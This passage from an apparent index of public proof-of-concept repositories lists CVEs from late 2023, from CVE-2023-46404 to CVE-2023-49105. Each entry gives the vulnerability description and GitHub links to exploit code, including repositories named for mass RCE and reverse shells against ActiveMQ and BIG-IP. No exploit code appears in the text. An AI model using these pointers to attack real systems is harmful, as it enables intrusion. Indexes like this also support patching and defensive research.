PCRS <= 3.11 (d0de1e) “Questions” page and “Code editor” page are vulnerable to remote code execution (RCE) by escaping Python sandboxing.
- [windecks/CVE-2023-46404](https://github.com/windecks/CVE-2023-46404)
### CVE-2023-46442 (-)
An infinite loop in the retrieveActiveBody function of Soot before v4.4.1 under Java 8 allows attackers to cause a Denial of Service (DoS).
- [JAckLosingHeart/CVE-2023-46442_POC](https://github.com/JAckLosingHeart/CVE-2023-46442_POC)
### CVE-2023-46447 (2024-01-20)
The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.
- [actuator/rebel](https://github.com/actuator/rebel)
### CVE-2023-46449 (2023-10-26)
Sourcecodester Free and Open Source inventory management system v1.0 is vulnerable to Incorrect Access Control. An arbitrary user can change the password of another user and takeover the account via IDOR in the password change function.
- [sajaljat/CVE-2023-46449](https://github.com/sajaljat/CVE-2023-46449)
### CVE-2023-46450 (2023-10-26)
Sourcecodester Free and Open Source inventory management system 1.0 is vulnerable to Cross Site Scripting (XSS) via the Add supplier function.
- [yte121/-CVE-2023-46450](https://github.com/yte121/-CVE-2023-46450)
### CVE-2023-46451 (2023-10-31)
Best Courier Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the change username field.
- [sajaljat/CVE-2023-46451](https://github.com/sajaljat/CVE-2023-46451)
### CVE-2023-46454 (2023-12-12)
In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality.
- [cyberaz0r/GL.iNet-Multiple-Vulnerabilities](https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities)
### CVE-2023-46474 (2024-01-11)
File Upload vulnerability PMB v.7.4.8 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted PHP file uploaded to the start_import.php file.
- [Xn2/CVE-2023-46474](https://github.com/Xn2/CVE-2023-46474)
### CVE-2023-46478 (2023-10-30)
An issue in minCal v.1.0.0 allows a remote attacker to execute arbitrary code via a crafted script to the customer_data parameter.
- [mr-xmen786/CVE-2023-46478](https://github.com/mr-xmen786/CVE-2023-46478)
### CVE-2023-46480 (2023-11-27)
An issue in OwnCast v.0.1.1 allows a remote attacker to execute arbitrary code and obtain sensitive information via the authHost parameter of the indieauth function.
- [shahzaibak96/CVE-2023-46480](https://github.com/shahzaibak96/CVE-2023-46480)
### CVE-2023-46501 (2023-11-07)
An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function.
- [Cyber-Wo0dy/CVE-2023-46501](https://github.com/Cyber-Wo0dy/CVE-2023-46501)
### CVE-2023-46604 (2023-10-27)
The Java OpenWire protocol marshaller is vulnerable to Remote Code \nExecution. This vulnerability may allow a remote attacker with network \naccess to either a Java-based OpenWire broker or client to run arbitrary\n shell commands by manipulating serialized class types in the OpenWire \nprotocol to cause either the client or the broker (respectively) to \ninstantiate any class on the classpath.\n\nUsers are recommended to upgrade\n both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 \nwhich fixes this issue.\n\n
- [trganda/ActiveMQ-RCE](https://github.com/trganda/ActiveMQ-RCE)
- [X1r0z/ActiveMQ-RCE](https://github.com/X1r0z/ActiveMQ-RCE)
- [JaneMandy/ActiveMQ_RCE_Pro_Max](https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max)
- [SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ)
- [evkl1d/CVE-2023-46604](https://github.com/evkl1d/CVE-2023-46604)
- [sule01u/CVE-2023-46604](https://github.com/sule01u/CVE-2023-46604)
- [justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp](https://github.com/justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp)
- [h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up](https://github.com/h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up)
- [duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell](https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell)
- [vjayant93/CVE-2023-46604-POC](https://github.com/vjayant93/CVE-2023-46604-POC)
- [LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence](https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence)
- [NKeshawarz/CVE-2023-46604-RCE](https://github.com/NKeshawarz/CVE-2023-46604-RCE)
- [minhangxiaohui/ActiveMQ_CVE-2023-46604](https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604)
- [nitzanoligo/CVE-2023-46604-demo](https://github.com/nitzanoligo/CVE-2023-46604-demo)
- [tomasmussi-mulesoft/activemq-cve-2023-46604](https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604)
- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab)
- [mrpentst/CVE-2023-46604](https://github.com/mrpentst/CVE-2023-46604)
- [dcm2406/CVE-2023-46604](https://github.com/dcm2406/CVE-2023-46604)
- [Mudoleto/Broker_ApacheMQ](https://github.com/Mudoleto/Broker_ApacheMQ)
- [hh-hunter/cve-2023-46604](https://github.com/hh-hunter/cve-2023-46604)
- [stegano5/ExploitScript-CVE-2023-46604](https://github.com/stegano5/ExploitScript-CVE-2023-46604)
- [Arlenhiack/ActiveMQ-RCE-Exploit](https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit)
- [vulncheck-oss/cve-2023-46604](https://github.com/vulncheck-oss/cve-2023-46604)
- [thinkycx/activemq-rce-cve-2023-46604](https://github.com/thinkycx/activemq-rce-cve-2023-46604)
- [mranv/honeypot.rs](https://github.com/mranv/honeypot.rs)
- [pulentoski/CVE-2023-46604](https://github.com/pulentoski/CVE-2023-46604)
- [cuanh2333/CVE-2023-46604](https://github.com/cuanh2333/CVE-2023-46604)
### CVE-2023-46615 (2024-02-12)
Deserialization of Untrusted Data vulnerability in Kalli Dan. KD Coming Soon.This issue affects KD Coming Soon: from n/a through 1.7.\n\n
- [RandomRobbieBF/CVE-2023-46615](https://github.com/RandomRobbieBF/CVE-2023-46615)
### CVE-2023-46694 (-)
Vtenext 21.02 allows an authenticated attacker to upload arbitrary files, potentially enabling them to execute remote commands. This flaw exists due to the application's failure to enforce proper authentication controls when accessing the Ckeditor file manager functionality.
- [invisiblebyte/CVE-2023-46694](https://github.com/invisiblebyte/CVE-2023-46694)
### CVE-2023-46747 (2023-10-26)
\n\n\nUndisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n
- [bijaysenihang/CVE-2023-46747-Mass-RCE](https://github.com/bijaysenihang/CVE-2023-46747-Mass-RCE)
- [W01fh4cker/CVE-2023-46747-RCE](https://github.com/W01fh4cker/CVE-2023-46747-RCE)
- [fu2x2000/CVE-2023-46747](https://github.com/fu2x2000/CVE-2023-46747)
- [maniak-academy/Mitigate-CVE-2023-46747](https://github.com/maniak-academy/Mitigate-CVE-2023-46747)
- [y4v4z/CVE-2023-46747-POC](https://github.com/y4v4z/CVE-2023-46747-POC)
- [nvansluis/test_cve-2023-46747](https://github.com/nvansluis/test_cve-2023-46747)
- [RevoltSecurities/CVE-2023-46747](https://github.com/RevoltSecurities/CVE-2023-46747)
- [vidura2/cve-2023-46747](https://github.com/vidura2/cve-2023-46747)
- [rainbowhatrkn/CVE-2023-46747-RCE](https://github.com/rainbowhatrkn/CVE-2023-46747-RCE)
- [AMELYA13/CVE-2023-46747-Mass-RCE](https://github.com/AMELYA13/CVE-2023-46747-Mass-RCE)
- [MacTavish2/CVE-2023-46747-Mass-RCE](https://github.com/MacTavish2/CVE-2023-46747-Mass-RCE)
- [zgimszhd61/CVE-2023-46747-RCE-poc](https://github.com/zgimszhd61/CVE-2023-46747-RCE-poc)
### CVE-2023-46805 (2024-01-12)
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
- [yoryio/CVE-2023-46805](https://github.com/yoryio/CVE-2023-46805)
- [cbeek-r7/CVE-2023-46805](https://github.com/cbeek-r7/CVE-2023-46805)
- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887)
- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887)
- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan)
- [Chocapikk/CVE-2023-46805](https://github.com/Chocapikk/CVE-2023-46805)
- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped)
- [w2xim3/CVE-2023-46805](https://github.com/w2xim3/CVE-2023-46805)
### CVE-2023-46813 (2023-10-27)
An issue was discovered in the Linux kernel before 6.5.9, exploitable by local users with userspace access to MMIO registers. Incorrect access checking in the #VC handler and instruction emulation of the SEV-ES emulation of MMIO accesses could lead to arbitrary write access to kernel memory (and thus privilege escalation). This depends on a race condition through which userspace can replace an instruction before the #VC handler reads it.
- [Freax13/cve-2023-46813-poc](https://github.com/Freax13/cve-2023-46813-poc)
### CVE-2023-46818 (2023-10-27)
An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
### CVE-2023-46865 (2023-10-30)
/api/v1/company/upload-logo in CompanyController.php in crater through 6.0.6 allows a superadmin to execute arbitrary PHP code by placing this code into an image/png IDAT chunk of a Company Logo image.
- [asylumdx/Crater-CVE-2023-46865-RCE](https://github.com/asylumdx/Crater-CVE-2023-46865-RCE)
### CVE-2023-46870 (-)
extcap/nrf_sniffer_ble.py, extcap/nrf_sniffer_ble.sh, extcap/SnifferAPI/*.py in Nordic Semiconductor nRF Sniffer for Bluetooth LE 3.0.0, 3.1.0, 4.0.0, 4.1.0, and 4.1.1 have set incorrect file permission, which allows attackers to do code execution via modified bash and python scripts.
- [Chapoly1305/CVE-2023-46870](https://github.com/Chapoly1305/CVE-2023-46870)
### CVE-2023-46948
- [AzraelsBlade/CVE-2023-46948](https://github.com/AzraelsBlade/CVE-2023-46948)
### CVE-2023-46954 (2023-11-03)
SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter.
- [jakedmurphy1/CVE-2023-46954](https://github.com/jakedmurphy1/CVE-2023-46954)
### CVE-2023-46974 (2023-12-07)
Cross Site Scripting vulnerability in Best Courier Management System v.1.000 allows a remote attacker to execute arbitrary code via a crafted payload to the page parameter in the URL.
- [yte121/CVE-2023-46974](https://github.com/yte121/CVE-2023-46974)
### CVE-2023-46980 (2023-11-03)
An issue in Best Courier Management System v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted script to the userID parameter.
- [sajaljat/CVE-2023-46980](https://github.com/sajaljat/CVE-2023-46980)
### CVE-2023-46998 (2023-11-07)
Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions.
- [soy-oreocato/CVE-2023-46998](https://github.com/soy-oreocato/CVE-2023-46998)
### CVE-2023-47014 (2023-11-22)
A Cross-Site Request Forgery (CSRF) vulnerability in Sourcecodester Sticky Notes App Using PHP with Source Code v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to add-note.php.
- [emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS](https://github.com/emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS)
### CVE-2023-47102 (2023-11-07)
UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.
- [nitipoom-jar/CVE-2023-47102](https://github.com/nitipoom-jar/CVE-2023-47102)
### CVE-2023-47108 (2023-11-10)
OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. Prior to version 0.46.0, the grpc Unary Server Interceptor out of the box adds labels `net.peer.sock.addr` and `net.peer.sock.port` that have unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent. An attacker can easily flood the peer address and port for requests. Version 0.46.0 contains a fix for this issue. As a workaround to stop being affected, a view removing the attributes can be used. The other possibility is to disable grpc metrics instrumentation by passing `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`.
- [bahe-msft/govuln-CVE-2023-47108](https://github.com/bahe-msft/govuln-CVE-2023-47108)
### CVE-2023-47119 (2023-11-10)
Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some links can inject arbitrary HTML tags when rendered through our Onebox engine. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds.
- [BaadMaro/CVE-2023-47119](https://github.com/BaadMaro/CVE-2023-47119)
- [Cristiano100/CVE-2023-47119](https://github.com/Cristiano100/CVE-2023-47119)
### CVE-2023-47129 (2023-11-10)
Statmic is a core Laravel content management system Composer package. Prior to versions 3.4.13 and 4.33.0, on front-end forms with an asset upload field, PHP files crafted to look like images may be uploaded. This only affects forms using the "Forms" feature and not just _any_ arbitrary form. This does not affect the control panel. This issue has been patched in 3.4.13 and 4.33.0.\n
- [Cyber-Wo0dy/CVE-2023-47129](https://github.com/Cyber-Wo0dy/CVE-2023-47129)
### CVE-2023-47179
- [RandomRobbieBF/CVE-2023-47179](https://github.com/RandomRobbieBF/CVE-2023-47179)
### CVE-2023-47218 (2024-02-13)
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n
- [passwa11/CVE-2023-47218](https://github.com/passwa11/CVE-2023-47218)
### CVE-2023-47246 (2023-11-10)
In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.
- [W01fh4cker/CVE-2023-47246-EXP](https://github.com/W01fh4cker/CVE-2023-47246-EXP)
- [rainbowhatrkn/CVE-2023-47246](https://github.com/rainbowhatrkn/CVE-2023-47246)
- [tucommenceapousser/CVE-2023-47246](https://github.com/tucommenceapousser/CVE-2023-47246)
### CVE-2023-47253 (2023-11-06)
Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.
- [OpenXP-Research/CVE-2023-47253](https://github.com/OpenXP-Research/CVE-2023-47253)
- [gmh5225/CVE-2023-47253](https://github.com/gmh5225/CVE-2023-47253)
### CVE-2023-47355 (2024-02-05)
The com.eypcnnapps.quickreboot (aka Eyuep Can Yilmaz {ROOT] Quick Reboot) application 1.0.8 for Android has exposed broadcast receivers for PowerOff, Reboot, and Recovery (e.g., com.eypcnnapps.quickreboot.widget.PowerOff) that are susceptible to unauthorized broadcasts because of missing input validation.
- [actuator/com.eypcnnapps.quickreboot](https://github.com/actuator/com.eypcnnapps.quickreboot)
### CVE-2023-47400
- [LucasVanHaaren/CVE-2023-47400](https://github.com/LucasVanHaaren/CVE-2023-47400)
### CVE-2023-47437 (2023-11-27)
A vulnerability has been identified in Pachno 1.0.6 allowing an authenticated attacker to execute a cross-site scripting (XSS) attack. The vulnerability exists due to inadequate input validation in the Project Description and comments, which enables an attacker to inject malicious java script.
- [herombey/CVE-2023-47437](https://github.com/herombey/CVE-2023-47437)
### CVE-2023-47459 (2024-01-16)
An issue in Knovos Discovery v.22.67.0 allows a remote attacker to obtain sensitive information via the /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName component.
- [aleksey-vi/CVE-2023-47459](https://github.com/aleksey-vi/CVE-2023-47459)
### CVE-2023-47460 (2024-01-16)
SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component.
- [aleksey-vi/CVE-2023-47460](https://github.com/aleksey-vi/CVE-2023-47460)
### CVE-2023-47464 (2023-11-30)
Insecure Permissions vulnerability in GL.iNet AX1800 version 4.0.0 before 4.5.0 allows a remote attacker to execute arbitrary code via the upload API function.
- [HadessCS/CVE-2023-47464](https://github.com/HadessCS/CVE-2023-47464)
### CVE-2023-47488 (2023-11-09)
Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page.
- [nitipoom-jar/CVE-2023-47488](https://github.com/nitipoom-jar/CVE-2023-47488)
### CVE-2023-47489 (2023-11-09)
CSV injection in export as csv in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components.
- [nitipoom-jar/CVE-2023-47489](https://github.com/nitipoom-jar/CVE-2023-47489)
### CVE-2023-47504 (2024-04-24)
Improper Authentication vulnerability in Elementor Elementor Website Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Elementor Website Builder: from n/a through 3.16.4.\n\n
- [davidxbors/CVE-2023-47504-POC](https://github.com/davidxbors/CVE-2023-47504-POC)
### CVE-2023-47529 (2023-11-23)
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in ThemeIsle Cloud Templates & Patterns collection.This issue affects Cloud Templates & Patterns collection: from n/a through 1.2.2.\n\n
- [RandomRobbieBF/CVE-2023-47529](https://github.com/RandomRobbieBF/CVE-2023-47529)
### CVE-2023-47564 (2024-02-02)
An incorrect permission assignment for critical resource vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow authenticated users to read or modify the resource via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQsync Central 4.4.0.15 ( 2024/01/04 ) and later\nQsync Central 4.3.0.11 ( 2024/01/11 ) and later\n
- [C411e/CVE-2023-47564](https://github.com/C411e/CVE-2023-47564)
### CVE-2023-47668 (2023-11-23)
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StellarWP Membership Plugin – Restrict Content plugin <= 3.2.7 versions.
- [RandomRobbieBF/CVE-2023-47668](https://github.com/RandomRobbieBF/CVE-2023-47668)
### CVE-2023-47840 (2023-12-29)
Improper Control of Generation of Code ('Code Injection') vulnerability in Qode Interactive Qode Essential Addons.This issue affects Qode Essential Addons: from n/a through 1.5.2.\n\n
- [RandomRobbieBF/CVE-2023-47840](https://github.com/RandomRobbieBF/CVE-2023-47840)
### CVE-2023-47882 (2023-12-27)
The Kami Vision YI IoT com.yunyi.smartcamera application through 4.1.9_20231127 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component.
- [actuator/yi](https://github.com/actuator/yi)
### CVE-2023-47883 (2023-12-27)
The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity.
- [actuator/com.altamirano.fabricio.tvbrowser](https://github.com/actuator/com.altamirano.fabricio.tvbrowser)
### CVE-2023-47889 (2024-02-06)
The Android application BINHDRM26 com.bdrm.superreboot 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include powering off, system reboot & entering recovery mode.
- [actuator/com.bdrm.superreboot](https://github.com/actuator/com.bdrm.superreboot)
### CVE-2023-48022 (2023-11-28)
Anyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment
- [0x656565/CVE-2023-48022](https://github.com/0x656565/CVE-2023-48022)
- [jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022](https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022)
### CVE-2023-48028 (2023-11-17)
kodbox 1.46.01 has a security flaw that enables user enumeration. This problem is present on the login page, where an attacker can identify valid users based on varying response messages, potentially paving the way for a brute force attack.
- [nitipoom-jar/CVE-2023-48028](https://github.com/nitipoom-jar/CVE-2023-48028)
### CVE-2023-48029 (2023-11-17)
Corebos 8.0 and below is vulnerable to CSV Injection. An attacker with low privileges can inject a malicious command into a table. This vulnerability is exploited when an administrator visits the user management section, exports the data to a CSV file, and then opens it, leading to the execution of the malicious payload on the administrator's computer.
- [nitipoom-jar/CVE-2023-48029](https://github.com/nitipoom-jar/CVE-2023-48029)
### CVE-2023-48031 (2023-11-17)
OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type. In the comment function, an attacker can bypass security restrictions and upload a .bat file by manipulating the file's magic bytes to masquerade as an allowed type. This can enable the attacker to execute arbitrary code or establish a reverse shell, leading to unauthorized file writes or control over the victim's station via a crafted file upload operation.
- [nitipoom-jar/CVE-2023-48031](https://github.com/nitipoom-jar/CVE-2023-48031)
### CVE-2023-48034 (2023-11-27)
An issue discovered in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject arbitrary keystrokes via use of weak encryption.
- [aprkr/CVE-2023-48034](https://github.com/aprkr/CVE-2023-48034)
### CVE-2023-48084 (2023-12-14)
Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.
- [Hamibubu/CVE-2023-48084](https://github.com/Hamibubu/CVE-2023-48084)
- [bucketcat/CVE-2023-48084](https://github.com/bucketcat/CVE-2023-48084)
### CVE-2023-48104 (2024-01-16)
Alinto SOGo before 5.9.1 is vulnerable to HTML Injection.
- [E1tex/CVE-2023-48104](https://github.com/E1tex/CVE-2023-48104)
### CVE-2023-48123 (2023-12-06)
An issue in Netgate pfSense Plus v.23.05.1 and before and pfSense CE v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the packet_capture.php file.
- [NHPT/CVE-2023-48123](https://github.com/NHPT/CVE-2023-48123)
### CVE-2023-48194 (2024-07-09)
Vulnerability in Tenda AC8v4 .V16.03.34.09 due to sscanf and the last digit of s8 being overwritten with \x0. After executing set_client_qos, control over the gp register can be obtained.
- [zt20xx/CVE-2023-48194](https://github.com/zt20xx/CVE-2023-48194)
### CVE-2023-48197 (2023-11-15)
Cross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cookies when the victim clicks on the "see QR code" function.
- [nitipoom-jar/CVE-2023-48197](https://github.com/nitipoom-jar/CVE-2023-48197)
### CVE-2023-48198 (2023-11-15)
A Cross-Site Scripting (XSS) vulnerability in the 'product description' component within '/api/stock/products' of Grocy version <= 4.0.3 allows attackers to obtain a victim's cookies.
- [nitipoom-jar/CVE-2023-48198](https://github.com/nitipoom-jar/CVE-2023-48198)
### CVE-2023-48199 (2023-11-15)
HTML Injection vulnerability in the 'manageApiKeys' component in Grocy <= 4.0.3 allows attackers to inject arbitrary HTML content without script execution. This occurs when user-supplied data is not appropriately sanitized, enabling the injection of HTML tags through parameter values. The attacker can then manipulate page content in the QR code detail popup, often coupled with social engineering tactics, exploiting both the trust of users and the application's lack of proper input handling.
- [nitipoom-jar/CVE-2023-48199](https://github.com/nitipoom-jar/CVE-2023-48199)
### CVE-2023-48200 (2023-11-15)
Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component.
- [nitipoom-jar/CVE-2023-48200](https://github.com/nitipoom-jar/CVE-2023-48200)
### CVE-2023-48777 (2024-03-26)
Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.\n\n
- [AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777](https://github.com/AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777)
### CVE-2023-48788 (2024-03-12)
A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.
- [horizon3ai/CVE-2023-48788](https://github.com/horizon3ai/CVE-2023-48788)
### CVE-2023-48842 (2023-12-01)
D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi.
- [creacitysec/CVE-2023-48842](https://github.com/creacitysec/CVE-2023-48842)
### CVE-2023-48849 (2023-12-06)
Ruijie EG Series Routers version EG_3.0(1)B11P216 and before allows unauthenticated attackers to remotely execute arbitrary code due to incorrect filtering.
- [delsploit/CVE-2023-48849](https://github.com/delsploit/CVE-2023-48849)
### CVE-2023-48858 (2024-01-17)
A Cross-site scripting (XSS) vulnerability in login page php code in Armex ABO.CMS 5.9 allows remote attackers to inject arbitrary web script or HTML via the login.php? URL part.
- [Shumerez/CVE-2023-48858](https://github.com/Shumerez/CVE-2023-48858)
### CVE-2023-48866 (2023-12-04)
A Cross-Site Scripting (XSS) vulnerability in the recipe preparation component within /api/objects/recipes and note component within /api/objects/shopping_lists/ of Grocy <= 4.0.3 allows attackers to obtain the victim's cookies.
- [nitipoom-jar/CVE-2023-48866](https://github.com/nitipoom-jar/CVE-2023-48866)
### CVE-2023-48974 (2024-02-08)
Cross Site Scripting vulnerability in Axigen WebMail prior to 10.3.3.61 allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter.
- [vinnie1717/CVE-2023-48974](https://github.com/vinnie1717/CVE-2023-48974)
### CVE-2023-48981
- [tristao-marinho/CVE-2023-48981](https://github.com/tristao-marinho/CVE-2023-48981)
### CVE-2023-48982
- [tristao-marinho/CVE-2023-48982](https://github.com/tristao-marinho/CVE-2023-48982)
### CVE-2023-48983
- [tristao-marinho/CVE-2023-48983](https://github.com/tristao-marinho/CVE-2023-48983)
### CVE-2023-49002 (2023-12-27)
An issue in Xenom Technologies (sinous) Phone Dialer-voice Call Dialer v.1.2.5 allows an attacker to bypass intended access restrictions via interaction with com.funprime.calldialer.ui.activities.OutgoingActivity.
- [actuator/com.sinous.voice.dialer](https://github.com/actuator/com.sinous.voice.dialer)
### CVE-2023-49003 (2023-12-27)
An issue in simplemobiletools Simple Dialer 5.18.1 allows an attacker to bypass intended access restrictions via interaction with com.simplemobiletools.dialer.activities.DialerActivity.
- [actuator/com.simplemobiletools.dialer](https://github.com/actuator/com.simplemobiletools.dialer)
### CVE-2023-49038 (2024-01-29)
Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root.
- [christopher-pace/CVE-2023-49038](https://github.com/christopher-pace/CVE-2023-49038)
### CVE-2023-49052 (2023-11-30)
File Upload vulnerability in Microweber v.2.0.4 allows a remote attacker to execute arbitrary code via a crafted script to the file upload function in the created forms component.
- [Cyber-Wo0dy/CVE-2023-49052](https://github.com/Cyber-Wo0dy/CVE-2023-49052)
### CVE-2023-49070 (2023-12-05)
\nPre-auth RCE in Apache Ofbiz 18.12.09.\n\nIt's due to XML-RPC no longer maintained still present.\nThis issue affects Apache OFBiz: before 18.12.10. \nUsers are recommended to upgrade to version 18.12.10\n\n
- [abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC](https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC)
- [0xrobiul/CVE-2023-49070](https://github.com/0xrobiul/CVE-2023-49070)
- [D0g3-8Bit/OFBiz-Attack](https://github.com/D0g3-8Bit/OFBiz-Attack)
- [UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz](https://github.com/UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz)
- [yukselberkay/CVE-2023-49070_CVE-2023-51467](https://github.com/yukselberkay/CVE-2023-49070_CVE-2023-51467)
- [Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467](https://github.com/Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467)
### CVE-2023-49103 (2023-11-21)
An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure.
- [creacitysec/CVE-2023-49103](https://github.com/creacitysec/CVE-2023-49103)
- [merlin-ke/OwnCloud-CVE-2023-49103](https://github.com/merlin-ke/OwnCloud-CVE-2023-49103)
- [d0rb/CVE-2023-49103](https://github.com/d0rb/CVE-2023-49103)
### CVE-2023-49105 (2023-11-21)
